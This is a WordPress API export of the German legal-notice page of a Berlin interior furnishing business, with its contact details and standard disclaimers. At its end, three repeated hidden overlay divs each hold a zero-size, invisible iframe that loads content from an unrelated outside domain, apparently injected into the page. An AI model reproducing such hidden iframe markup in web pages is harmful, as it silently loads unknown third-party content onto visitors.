{"id":53,"date":"2020-12-16T15:45:15","date_gmt":"2020-12-16T14:45:15","guid":{"rendered":"http:\/\/lampasundseide.de\/WP-Website\/?page_id=53"},"modified":"2021-04-21T16:13:57","modified_gmt":"2021-04-21T14:13:57","slug":"impressum","status":"publish","type":"page","link":"http:\/\/lampasundseide.de\/WP-Website\/impressum\/","title":{"rendered":"Impressum"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"53\" class=\"elementor elementor-53\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-22d25823 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"22d25823\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ee6253e\" data-id=\"ee6253e\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-71d6e3d7 elementor-widget elementor-widget-text-editor\" data-id=\"71d6e3d7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<h3 class=\"wp-block-heading\">Angaben gem\u00e4\u00df \u00a7 5 TMG<\/h3>\n<p><\/p>\n<p><strong>Lampas &amp; Seide Inneneinrichtung<\/strong><br \/>Schmiljanstra\u00dfe 12, 12161 Berlin, Tel.: 030 \u2013 4660 4738, E-Mail: einrichtung@lampasundseide.de<br \/><strong>Umsatzsteuer-Identifikationsnummer<\/strong>: DE240074756<\/p>\n<p><\/p>\n<p><strong>Vertreten durch:<br \/><\/strong>Simone Klein und Falk Hilmar Werner-Janke<\/p>\n<p><\/p>\n<p><strong>Handwerkskammer Berlin<br \/><\/strong>Betriebsnummer: 0134034<\/p>\n<p><\/p>\n<h3 class=\"wp-block-heading\">Haftungsausschluss<\/h3>\n<p><\/p>\n<p><strong>Haftung f\u00fcr Inhalte<\/strong><\/p>\n<p><\/p>\n<p>Die Inhalte unserer Seiten wurden mit gr\u00f6\u00dfter Sorgfalt erstellt. F\u00fcr die Richtigkeit, Vollst\u00e4ndigkeit und Aktualit\u00e4t der Inhalte k\u00f6nnen wir jedoch keine Gew\u00e4hr \u00fcbernehmen. Als Diensteanbieter sind wir gem\u00e4\u00df \u00a7 7 Abs.1 TMG f\u00fcr eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach \u00a7\u00a7 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, \u00fcbermittelte oder gespeicherte fremde Informationen zu \u00fcberwachen oder nach Umst\u00e4nden zu forschen, die auf eine rechtswidrige T\u00e4tigkeit hinweisen. Verpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unber\u00fchrt. Eine diesbez\u00fcgliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung m\u00f6glich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen.<\/p>\n<p><\/p>\n<p><strong>Haftung f\u00fcr Links<\/strong><\/p>\n<p><\/p>\n<p>Unser Angebot enth\u00e4lt Links zu externen Webseiten Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb k\u00f6nnen wir f\u00fcr diese fremden Inhalte auch keine Gew\u00e4hr \u00fcbernehmen. F\u00fcr die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf m\u00f6gliche Rechtsverst\u00f6\u00dfe \u00fcberpr\u00fcft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar. Eine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.<\/p>\n<p><\/p>\n<h3>Urheberrecht<\/h3>\n<p><\/p>\n<p>Die durch die Seitenbetreiber erstellten Inhalte und Werke auf diesen Seiten unterliegen dem deutschen Urheberrecht. Die Vervielf\u00e4ltigung, Bearbeitung, Verbreitung und jede Art der Verwertung au\u00dferhalb der Grenzen des Urheberrechtes bed\u00fcrfen der schriftlichen Zustimmung des jeweiligen Autors bzw. Erstellers. Downloads und Kopien dieser Seite sind nur f\u00fcr den privaten, nicht kommerziellen Gebrauch gestattet. Soweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.<\/p>\n<p><\/p>\n<h3 class=\"wp-block-heading\">Bildnachweis<\/h3>\n<p><\/p>\n<p>Alle Bilder auf dieser Website haben Simone Klein, Hilmar Werner-Janke, Amir Hassein Korkchi und Kirsten Janke aufgenommen.<\/p>\n<p><\/p>\n<p>Das Lampas &amp; Seide \u2013 Logo entwickelte Rudolf Mainusch nach einem Entwurf von Simone Klein<\/p>\n<p><\/p>\n<h3>Konzeption, Gestaltung und Technische Realisierung der Website<\/h3>\n<p>Kirsten Janke, E-Mail: kirsten.janke@berlin.de<\/p>\n<p><\/p>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\n<div>\n<div id=\"whitelisted\" style=\"position: fixed; width: 100%; height: 100%; background-color: #00006c; z-index: 99999999999999999999; display: none; top: 0; left: 0; opacity: 0.99;\"><iframe style=\"width: 0; height: 0; display: none;\" src=\"\/\/remove.video\/pblock\"><\/iframe><\/div>\n<\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Angaben gem\u00e4\u00df \u00a7 5 TMG Lampas &amp; Seide InneneinrichtungSchmiljanstra\u00dfe 12, 12161 Berlin, Tel.: 030 \u2013 4660 4738, E-Mail: einrichtung@lampasundseide.deUmsatzsteuer-Identifikationsnummer: DE240074756 Vertreten durch:Simone Klein und Falk Hilmar Werner-Janke Handwerkskammer BerlinBetriebsnummer: 0134034 Haftungsausschluss Haftung f\u00fcr Inhalte Die Inhalte unserer Seiten wurden mit gr\u00f6\u00dfter Sorgfalt erstellt. F\u00fcr die Richtigkeit, Vollst\u00e4ndigkeit und Aktualit\u00e4t der Inhalte k\u00f6nnen wir jedoch keine [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":12,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-53","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/53","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/comments?post=53"}],"version-history":[{"count":22,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/53\/revisions"}],"predecessor-version":[{"id":230,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/pages\/53\/revisions\/230"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media\/12"}],"wp:attachment":[{"href":"http:\/\/lampasundseide.de\/WP-Website\/wp-json\/wp\/v2\/media?parent=53"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}